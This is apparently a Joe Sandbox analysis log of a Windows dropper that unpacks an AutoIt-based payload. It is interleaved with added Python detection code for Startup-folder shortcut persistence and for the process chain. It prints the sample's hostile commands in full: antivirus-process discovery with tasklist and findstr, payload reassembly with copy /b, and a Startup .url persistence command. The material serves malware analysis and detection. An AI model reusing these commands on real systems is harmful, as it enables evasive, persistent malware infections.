      Source: C:\Users\user\Desktop\InsertSr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: InsertSr.exe | Static file information: File size 45088780 > 1048576
      Source: InsertSr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\InsertSr.exe | Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004C8B75 push ecx; ret 19_2_004C8B88
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004BCBF1 push eax; retf 19_2_004BCBF8
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001A8B75 push ecx; ret 22_2_001A8B88

      Persistence and Installation Behavior

      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | File created: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
      Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
      Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url
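The persistence mechanism here is a .url file in the user's Startup folder whose URL= entry points at a local .js rather than a web address; at logon the shell opens the shortcut, wscript.exe runs the script, and the script starts the dropped .scr. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses a constructed .url body shaped like what the two echo commands above write (CRLF endings, a trailing space after the section header and after the value, and the value wrapped in double quotes, all of which a strict INI parser may mishandle) and flags a Startup-folder shortcut whose target is a local script or executable under the user's profile. The extension lists, the finding names and the file:/// handling are this example's own choices.

```python
import re
from pathlib import PureWindowsPath

# Extension classes are this example's own choice.
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1", ".bat", ".cmd"}
EXEC_EXTS = {".exe", ".scr", ".pif", ".com", ".dll"}


def parse_internet_shortcut(text: str) -> dict:
    """Parse the INI-style body of a .url file into {section: {key: value}}.

    Tolerates what "echo ... > file" produces: CRLF line endings, a trailing space after
    the section header and after each value, and a value wrapped in double quotes.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            current = line.strip("[] ")          # "[InternetShortcut] " -> "InternetShortcut"
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip().strip('"')
    return sections


def shortcut_target(text: str) -> str:
    """Return the URL= target as a Windows path when it is local, else '' (web shortcuts are out of scope)."""
    url = parse_internet_shortcut(text).get("InternetShortcut", {}).get("url", "")
    if url.lower().startswith("file:///"):        # file:///C:/x/y.vbs -> C:\x\y.vbs
        url = url[8:].replace("/", "\\")
    if re.match(r"^[a-zA-Z]:\\", url) or url.startswith("\\\\"):
        return url
    return ""


def assess_startup_url(path: str, text: str) -> list:
    """Findings for the .url file at `path` with body `text` (finding names are this example's own)."""
    findings = []
    target = shortcut_target(text)
    if not target:
        return findings
    folder = str(PureWindowsPath(path).parent).lower()
    if "\\start menu\\programs\\startup" in folder:
        findings.append("local_target_in_startup")
    ext = PureWindowsPath(target).suffix.lower()
    if ext in SCRIPT_EXTS:
        findings.append("script_target")
    elif ext in EXEC_EXTS:
        findings.append("executable_target")
    if "\\appdata\\" in target.lower():
        findings.append("target_in_user_profile")
    return findings


# Constructed sample: the path and body the two echo commands in the report would produce.
SAMPLE_PATH = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url"
SAMPLE_BODY = ("[InternetShortcut] \r\n"
               "URL=\"C:\\Users\\user\\AppData\\Local\\Immersive Creations Co\\Virtuoso.js\" \r\n")

# Constructed control: an ordinary web shortcut in the same folder must produce no findings.
BENIGN_BODY = "[InternetShortcut]\r\nURL=https://example.com/\r\n"

if __name__ == "__main__":
    print(assess_startup_url(SAMPLE_PATH, SAMPLE_BODY))
```

On a live host the same function can be run over every *.url under each profile's Start Menu\Programs\Startup folder; a shortcut whose target is a script or executable under AppData is the pattern the report's "Drops script at startup location" signature describes.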
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_005259B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,19_2_005259B3
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004B5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,19_2_004B5EDA
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_002059B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,22_2_002059B3
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_00195EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,22_2_00195EDA
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004C33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_004C33B7
      Source: C:\Users\user\Desktop\InsertSr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\InsertSr.exe; Process information set: NOOPENFILEERRORBOX (11 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe; Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe; Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\Desktop\InsertSr.exe; Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\InsertSr.exe; Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\InsertSr.exe; Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_00504005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 19_2_00504005
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_0050C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 19_2_0050C2FF
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_0050494A GetFileAttributesW,FindFirstFileW,FindClose, 19_2_0050494A
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_0050CD14 FindFirstFileW,FindClose, 19_2_0050CD14
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_0050CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 19_2_0050CD9F
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_0050F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 19_2_0050F5D8
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_0050F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 19_2_0050F735
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_0050FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 19_2_0050FA36
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_00503CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 19_2_00503CE2
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Code function: 22_2_001E4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 22_2_001E4005
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Code function: 22_2_001EC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 22_2_001EC2FF
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Code function: 22_2_001E494A GetFileAttributesW,FindFirstFileW,FindClose, 22_2_001E494A
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Code function: 22_2_001ECD14 FindFirstFileW,FindClose, 22_2_001ECD14
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Code function: 22_2_001ECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 22_2_001ECD9F
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Code function: 22_2_001EF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 22_2_001EF5D8
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Code function: 22_2_001EF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 22_2_001EF735
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Code function: 22_2_001EFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 22_2_001EFA36
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Code function: 22_2_001E3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 22_2_001E3CE2
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_004B5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,FreeLibrary,GetSystemInfo,GetSystemInfo, 19_2_004B5D13
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\316094\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\316094
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\
Source: Virtuoso.scr, 00000016.00000002.3381885400.0000000001427000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: Intranet.pif, 00000013.00000002.3381802910.0000000001717000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_005145D5 BlockInput, 19_2_005145D5
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_004C8E89 _memset,IsDebuggerPresent, 19_2_004C8E89
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_004D5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 19_2_004D5CAC
Source: C:\Users\user\Desktop\InsertSr.exe; Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_004F88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 19_2_004F88CD
Source: C:\Windows\SysWOW64\tasklist.exe; Process token adjusted: Debug (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_004CA354 SetUnhandledExceptionFilter, 19_2_004CA354
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_004CA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_004CA385
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Code function: 22_2_001AA354 SetUnhandledExceptionFilter, 22_2_001AA354
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Code function: 22_2_001AA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_001AA385

      HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Memory written: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif base: C00000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Memory written: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr base: A00000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_004F9369 LogonUserW, 19_2_004F9369
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_004B5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 19_2_004B5240
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_00501AC6 SendInput,keybd_event, 19_2_00501AC6
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_005051E2 mouse_event, 19_2_005051E2
Source: C:\Users\user\Desktop\InsertSr.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 316094
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SequenceOctoberContributionRef" Recreation
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Metres + ..\Scientists + ..\Prep + ..\Responsible + ..\Stranger + ..\Components + ..\Medium + ..\Ima + ..\My + ..\Indiana u
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif Intranet.pif u
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Process created: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
Source: C:\Windows\System32\wscript.exe; Process created: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" "C:\Users\user\AppData\Local\Immersive Creations Co\D"
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Process created: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr"
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\virtuoso.url" & echo url="c:\users\user\appdata\local\immersive creations co\virtuoso.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\virtuoso.url" & exit (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_004F88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 19_2_004F88CD
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_00504F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 19_2_00504F1C
Source: InsertSr.exe, 00000000.00000002.2187271268.0000000002909000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170185448.0000000003B4B000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000000.2154175275.0000000000556000.00000002.00000001.01000000.00000007.sdmp; Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Intranet.pif, Virtuoso.scr; Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_004C885B cpuid 19_2_004C885B
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation
Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr; Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_004E0030 GetLocalTime,__swprintf, 19_2_004E0030
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_004E0722 GetUserNameW, 19_2_004E0722
Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif; Code function: 19_2_004D416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 19_2_004D416A
Source: C:\Users\user\Desktop\InsertSr.exe; Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406805
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
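The process-creation lines above spell out the whole batch-file dropper chain: the extensionless NSIS-dropped file is copied to a .bat and run, tasklist output is grepped for AV/EDR process names, a junk marker line is filtered out of an obfuscated fragment with findstr /V, the payload is reassembled with copy /b from ten fragment files, the result is executed under a .pif name from %LOCALAPPDATA%\Temp, and persistence is a .url shortcut in the Startup folder whose url= points at a local .js file. The following is an added example, not part of the Joe Sandbox report: detection logic in Python that scores Sysmon-style process-creation events per process tree. The events are constructed from the command lines in the report (the pids, the ProcEvent field names, the rule names and the CHAIN_THRESHOLD of three distinct stages are this example's own assumptions), and the .url check reads the file exactly as the two echo commands write it, quotes included.

```python
"""Detection logic for the batch-file dropper chain listed above.

Added example, not part of the Joe Sandbox report: the events are constructed from
the command lines shown (pids made up); rule names, the Sysmon-style field names
and CHAIN_THRESHOLD are this example's own assumptions.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# AV/EDR process names the dropper greps for via "tasklist | findstr" (from the report).
AV_PROCESS_NAMES = {"wrsa", "opssvc", "avastui", "avgui", "bdservicehost", "nswscsvc", "sophoshealth"}
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".bat", ".cmd", ".ps1", ".scr", ".pif", ".exe")
CHAIN_THRESHOLD = 3  # distinct stages seen in one process tree before it counts as the full chain


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # Sysmon EID 1 "Image": full path of the new process
    cmdline: str  # Sysmon EID 1 "CommandLine"


STARTUP_URL = r"c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\virtuoso.url"
LOCAL_JS = r"c:\users\user\appdata\local\immersive creations co\virtuoso.js"

# Constructed event stream modelled on the report's process tree (benign noise omitted).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Users\user\Desktop\InsertSr.exe", r'"C:\Users\user\Desktop\InsertSr.exe"'),
    ProcEvent(200, 100, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat'),
    ProcEvent(301, 200, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "wrsa opssvc"'),
    ProcEvent(304, 200, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /V "SequenceOctoberContributionRef" Recreation'),
    ProcEvent(305, 200, r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd /c copy /b ..\Metres + ..\Scientists + ..\Prep + ..\Responsible + ..\Stranger"
              r" + ..\Components + ..\Medium + ..\Ima + ..\My + ..\Indiana u"),
    ProcEvent(306, 200, r"C:\Users\user\AppData\Local\Temp\316094\Intranet.pif", "Intranet.pif u"),
    ProcEvent(400, 306, r"C:\Windows\SysWOW64\cmd.exe",
              f'cmd /k echo [internetshortcut] > "{STARTUP_URL}" & echo url="{LOCAL_JS}" >> "{STARTUP_URL}" & exit'),
]


def rule_av_discovery(ev: ProcEvent) -> bool:
    """findstr fed by tasklist, grepping for AV/EDR process names."""
    words = {w.lower() for q in re.findall(r'"([^"]*)"', ev.cmdline) for w in q.split()}
    return ev.image.lower().endswith("\\findstr.exe") and bool(words & AV_PROCESS_NAMES)


def rule_self_copy_to_bat(ev: ProcEvent) -> bool:
    """copy <blob> <blob>.bat & <blob>.bat: an extensionless dropped file run as a batch script."""
    return re.search(r"\bcopy\s+(\S+)\s+\1\.bat\s*&\s*\1\.bat\b", ev.cmdline, re.I) is not None


def rule_chunk_concat(ev: ProcEvent) -> bool:
    """copy /b a + b + c ...: binary reassembly of a payload from fragment files."""
    m = re.search(r"\bcopy\s+/b\s+(.+)", ev.cmdline, re.I)
    return m is not None and m.group(1).count("+") >= 2


def rule_suspicious_ext_from_appdata(ev: ProcEvent) -> bool:
    """A PE executed under a .pif/.scr name from a user-writable AppData\\Local path."""
    img = ev.image.lower()
    return img.endswith((".pif", ".scr")) and "\\appdata\\local\\" in img


def rule_startup_url_to_script(ev: ProcEvent) -> bool:
    """echo [internetshortcut] / url=<local script> written into the Startup folder."""
    low = ev.cmdline.lower()
    m = re.search(r'url="?([^"&>]+)', low)
    return ("[internetshortcut]" in low and "\\startup\\" in low
            and m is not None and m.group(1).strip().endswith(SCRIPT_EXTS))


RULES = {f.__name__.removeprefix("rule_"): f for f in (
    rule_av_discovery, rule_self_copy_to_bat, rule_chunk_concat,
    rule_suspicious_ext_from_appdata, rule_startup_url_to_script)}


def root_of(pid: int, parents: dict[int, int]) -> int:
    """Follow ppid links up to the first process whose parent was not logged."""
    while parents.get(pid) in parents:
        pid = parents[pid]
    return pid


def find_dropper_chains(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map root pid -> sorted stage names for every tree with at least CHAIN_THRESHOLD stages."""
    parents = {ev.pid: ev.ppid for ev in events}
    hits: dict[int, set[str]] = defaultdict(set)
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits[root_of(ev.pid, parents)].add(name)
    return {root: sorted(n) for root, n in hits.items() if len(n) >= CHAIN_THRESHOLD}


def is_local_script_shortcut(text: str) -> bool:
    """True when a .url file's URL= is a local script/executable path rather than a web URL.
    cmd's echo leaves the surrounding quotes in the file, so they are stripped first."""
    url = ""
    for line in text.splitlines():
        if line.lower().lstrip().startswith("url="):
            url = line.split("=", 1)[1].strip().strip('"').lower()
    return bool(url) and "://" not in url and url.endswith(SCRIPT_EXTS)


# The Startup .url exactly as the two echo commands above write it (constructed).
SAMPLE_URL_FILE = f'[internetshortcut] \nurl="{LOCAL_JS}" \n'
```

On the constructed events, find_dropper_chains(SAMPLE_EVENTS) attributes all five stages to the tree rooted at InsertSr.exe (pid 100), while the findstr /V marker-stripping step is deliberately not scored because it has too many benign uses; is_local_script_shortcut(SAMPLE_URL_FILE) is True, since the shortcut names a local .js rather than an http(s) URL. Correlating by root process rather than alerting on single stages is what keeps the rule quiet on admin scripts that legitimately use copy /b or findstr.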

      Stealing of Sensitive Information

Source: Yara match; File source: Process Memory Space: Intranet.pif PID: 1292, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: Virtuoso.scr PID: 2404, type: MEMORYSTR
Source: Virtuoso.scr; Binary or memory string: WIN_81
Source: Virtuoso.scr; Binary or memory string: WIN_XP
Source: Virtuoso.scr; Binary or memory string: WIN_XPe
Source: Virtuoso.scr; Binary or memory string: WIN_VISTA
Source: Virtuoso.scr; Binary or memory string: WIN_7
Source: Virtuoso.scr; Binary or memory string: WIN_8
